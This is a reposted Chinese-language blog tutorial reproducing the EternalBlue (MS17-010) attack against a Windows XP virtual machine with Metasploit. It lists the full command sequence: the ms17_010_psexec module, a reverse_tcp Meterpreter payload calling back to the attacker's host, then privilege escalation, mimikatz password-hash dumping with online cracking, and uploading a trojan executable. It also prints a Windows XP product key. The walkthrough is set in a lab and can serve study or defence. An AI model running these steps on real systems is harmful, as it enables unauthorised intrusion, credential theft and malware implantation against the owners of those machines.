【漏洞復現】永恆之藍 ms17-010 漏洞利用 攻擊手法



日期:2018-07-21 21:09:16
介紹:永恆之藍利用的 ms17-010 漏洞,拿 Shell、查看文件、獲取密碼。


0x01、實驗環境

攻擊機

系統:macOS Sierra 10.12.5
IP:10.211.55.2

靶機

系統:Windows XP SP3 英文版(虛擬機)
IP:10.211.55.19
激活碼:HTXH6-2JJC4-CDB6C-X38B4-C3GF3

0x02、使用 msf 攻擊 XP

mac 中使用 metasploitkali 中使用 metasploit 去做攻擊,流程是一樣的,按照以下步驟進行即可。

首先在命令行輸入 msfconsole 進入 metasploit

進入后,使用 search 命令,查找與 ms17-010 相關的模塊。

依次進行以下操作。

# 選擇 msf 相關的模塊
use exploit/windows/smb/ms17_010_psexec

# 查看需要設置的信息
show options

# 設置靶機的 IP 和端口
set rhosts 10.211.55.19
set rport 445

# 設置攻擊使用的 payload
set payload windows/meterpreter/reverse_tcp
set lhost 10.211.55.2
set lport 4444

# 進行攻擊
exploit

成功彈回 shell。

0x03、其他操作

查看靶機文件

查看靶機文件,可直接在 shell 中執行 cmd 命令。

也可以直接在 meterpreter 中操作。

提取 Windows 密碼

提取 Windows 密碼的 hash:

密碼哈希有三種方式:LM、NTLM、NTLMv2,LM 存儲的時候,7個字符一組(如果密碼長度是14位,就會分成兩組),NTLM 是整體轉換。
使用工具 mimikatz,獲取到 ntlm 的值,
然后去 http://www.objectif-securite.ch/en/ophcrack.php 解密即可。

相關命令:

getsystem
load mimikatz
msv

電腦鎖屏

shell
echo rundll32.exe user32.dll LockWorkStation  > 1.bat
1.bat

植入木馬

upload /tmp/muma.exe c:\\

0x04、其他

利用 meterpreter 還可以進行監聽鍵盤、獲取圖形化界面等操作,
此處不一一演示,有興趣可上網查詢相關資料。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM